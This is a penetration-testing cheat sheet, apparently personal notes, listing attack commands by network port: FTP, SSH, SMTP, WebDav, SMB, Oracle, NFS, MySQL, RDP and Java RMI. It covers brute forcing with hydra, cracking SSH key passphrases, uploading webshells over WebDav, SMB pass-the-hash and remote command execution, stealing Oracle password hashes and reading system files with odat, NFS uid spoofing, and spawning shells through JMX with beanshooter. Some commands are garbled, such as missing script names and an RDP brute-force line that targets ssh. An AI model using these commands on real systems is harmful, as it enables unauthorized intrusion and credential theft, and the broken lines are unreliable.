Network Services Exploitation

21 - FTP

# Login
ftp <ip>

# Anonymous login: after login use these creds [User:password]

# Anonymous login with nmap
nmap --script=ftp-anon -p21 <ip>
nmap -sC -sV -p21 <ip> # [better] ftp-anon is a default script

# Brute force login
hydra -L users.txt -P passwords.txt <ip> ftp
  • Search exploit for vulnerable version

22 - SSH

# Login with password
ssh <username>@<ip> # then type password

# Login with private key
ssh -i id_rsa <username>@<ip> # If private_key has passphrase you need to type it

# Crack passphrase
python id_rsa > id_rsa.hash
john id_rsa.hash -wordlist=<wordlist>

# Brute force login
hydra -L users.txt -P passwords.txt <ip> ssh
  • Search exploit for vulnerable version


25 - SMTP

  • Search exploit for vulnerable version

  • Retrieve the hostname of the server (domain name)

    • francesco@debian:~$ nc <ip> <port>
      220 ESMTP Postfix: Welcome.    # Here (in the banner)
      helo whatyouwant                               # helo command
      250                            # Here
  • Username Bruteforce

    • Automation:

      smtp-user-enum -U <wordlist> -t <ip>
    • Manual

      francesco@debian:~$ nc <ip> <port>
      220 ESMTP Postfix: Welcome.
      VRFY  root
      252 2.0.0 root                                 # Output if user exists
      VRFY  idontexists
      550 5.1.1 <idontexists>: Recipient address rejected: User unknown in local recipient table

Note: there are other command you can use such as RCPT TO.

80 - WebDav

  • With WebDav you can upload file. Normally it's necessary credentials

    • Bruteforce (it's simple HTTP Basic Authentication)

  • You can automate the upload and execution of file

# 1 tool - davtest
# Check what file type is executed
davtest -auth <user>:<password> -url http://<ip>/<webdav_path>
# Upload file
davtest --url http://<ip>/<webdav_path> -auth <user>:<password> -uploadfile webshell.asp -uploadloc /destination/webshell.asp

# 2 tool - cadaver
cadaver http://<ip>/<webdav_path> # then login.
# Use PUT command to upload file

139/445 - SMB | Samba

# List shared folders
smbclient --no-pass -L //<ip> # Null user
smbclient -U 'admin%pwd' -L //<ip> # (1) With credential
smbclient -U 'admin' -L //<ip> # (2) With credential [pwd omitted, then type it]
smbclient -U 'admin' --pw-nt-hash <hash> -L //<ip> # With hash (pass the hash)

# Obtain information (you can also enumerate users)
enum4linux -a [-u "<username>" -p "<passwd>"] <ip>

# Command execution (authenticated)
smbmap -H <ip> -u <user> -p <pass> -x 'ipconfig'
python3 Administrator@ip # Even exploit/windows/smb/psexec metasploit module
  • Brute force login

  • Search exploit for vulnerable version

  • If v1 is enabled - EternalBlue exploit (check with nmap -> smb-protocols)

1521 - ORACLE DB (TNS protocol)


Oracle clients communicate with the database using the TNS protocol

In Oracle DB a SID is specific to a database, it is unique in an environment and 'points' to one, and only one, database in an environment. A service name can be associated with one or more SIDs.

In a RAC environment where each instance is uniquely named yet all can be accessed through the SERVICE_NAME. [Oracle Real Application Cluster (RAC) is a "share-everything" database architecture in which two or more Oracle RAC nodes are clustered together and share the same memory]

test1      test
test2      test

All of those SIDs can be associated with the SERVICE_NAME test, and if load balancing is configured, the listener will 'balance' the workload across all SIDs. However, if you want, you can connect to test1, you just need to NOT use the SERVICE_NAME and use the SID.

# Oracle DB version
odat tnscmd -s <ip> --version

# Search valid SIDs (with default wordlist and bruteforce [default max-size 2 chars])
odat sidguesser -s <ip>

# Search valid SIDs with custom sids wordlist
odat sidguesser -s <ip> --sids-file sids.txt

# Search valid SNs (with default wordlist and bruteforce [default max-size 2 chars])
odat snguesser -s <ip>

# Search valid SNs with custom SNs wordlist
odat snguesser -s <ip> --service-name-file sn.txt

Find user credentials

  • [CVE-2012-3137] You need a valid SID and Oracle DB version is one of this (,,,,, you can obtain the session key and salt for arbitrary users.

  • [Guess password] You need SID or SN

# Guess password with SID/SN using default odat credentials
odat passwordguesser -s <ip> -d <SID>
odat passwordguesser -s <ip> -n <SN>

Analyze database

# enumerate database
odat search -s <ip> -d <SID> -p <port> -U <username> -P <password>  --basic-info
# open sql shell
odat search -s <ip> -d <SID> -p <port> -U <username> -P <password>  --sql-shell
# get hashed password when the account is not locked
odat passwordstealer -s <IP> -d <SID> -p <port> -U mobius -P <password> --get-passwords-not-locked
# read file (ex. ssh private key)
odat externaltable -s <IP> -d <SID> -p <port> -U mobius -P <password> --getFile /etc passwd passwd
# create file with cve-2018-3004 (ex. upload authorized key)
odat cve -s <IP> -d <SID> -p <port> -U mobius -P <password> --cve-2018-3004 /tmp/test "test"

# NOTE: there are many other things and techniques you can use with odat. Refer to the documentation

2049 - NFS

# Folder available to mount
showmount -e <ip>
# Mount
mount -t nfs <ip>:/test /mnt/folder
# Umount
umount /mnt/folder

# If you can't read/write inside the folder, you can create/modify uid of a user
### ls -lna /mnt/folder
### drwxrwxr-x     6 777     1   4096 Jan  7  2018 QWERTY
# 1 method
useradd newuser
usermod -u 6 newuser
## 2 method
nano /etc/passwd # edit uid
# Note if it doesn't work, umount, edit uid, mount again 

3306 - MYSQL

# Local without pass
mysql -u root
# Local with pass
mysql -u root -p
# Remote without pass
mysql -h <hostname> -u root
# Remote with pass
mysql -h <hostname> -u root -p 
  • Brute force login

    • Try with root default user

3389 - RDP

# Login 
xfreerdp /v:<ip> /u:<username> /p:<password>

# Brute force login
hydra -L users.txt -P passwords.txt <ip> ssh
  • Search exploit for vulnerable version

Tip: If you are not sure that specific port runs rdp you can check with auxiliary/scanner/rdp/rdp_scanner or try to connect with xfreerdp

5985,5986 - WinRM

  • Brute force login

Java RMI

# Tool:

rmg enum <ip> <port>

# Note: there are many other things and techniques you can use with rmg. Refer to the documentation


# Find JMX port 
nmap -sC -sV -p 45000 <ip>   

45000/tcp open  java-rmi Java RMI
| rmi-dumpregistry: 
|   jmxrmi


# Tool:
# jconsole (/usr/lib/jvm/java-xxxxxx-openjdk-amd64/bin/jconsole)
# (Some jdk doesn't include jconsole)

# Check credentials
jconsole # connect <hostname>:<port>. [without credentials]

# Enumerate configuration
beanshooter enum <ip> <jmx_port>
# The best way to get a shell is with tonka 
# Creating a TemplateImpl payload object to abuse StandardMBean
beanshooter standard <ip> <jmx_port> tonka
# Spawns a shell. NOTE: this works even if the target host doesn't reach you
beanshooter tonka shell <ip> <jmx_port>

# Note: there are many other things and techniques you can use with beanshooter. Refer to the documentation

Beanshooter Tips

  • If your local Java version is higher than the Java version of the application server, the server cannot load the bytecode and throws an exception.

  • How to know what java version the server is running? Connect with jconsole, then go to "VM Summary", find "VM Arguments" and search "Boot class path".

  • Install with maven

My installation method (sdkman)
# 1 - Install sdkman
curl -s "" | bash
source "$HOME/.sdkman/bin/"
sdk version

# 2 - Install jdk (ex. java 8) [choose based on the taget]
sdk install java 8.0.275.hs-adpt

# 3 - Install maven
sdk install maven

# 4 - Check installation
mvn -v

Apache Maven 3.9.8
Java version: 1.8.0_275, vendor: AdoptOpenJDK, runtime: /home/kali/.sdkman/candidates/java/8.0.275.hs-adpt/jre

# 5 - Now you can install beanshooter

Other ports

Most of the services identified by the Nmap scan are easily recognizable, however, it's possibile that there are a few open ports on a target system that do not have a service banner. To learn more about these port and the service running, we can perform banner grabbing with Netcat

netcat <ip> <port>

Last updated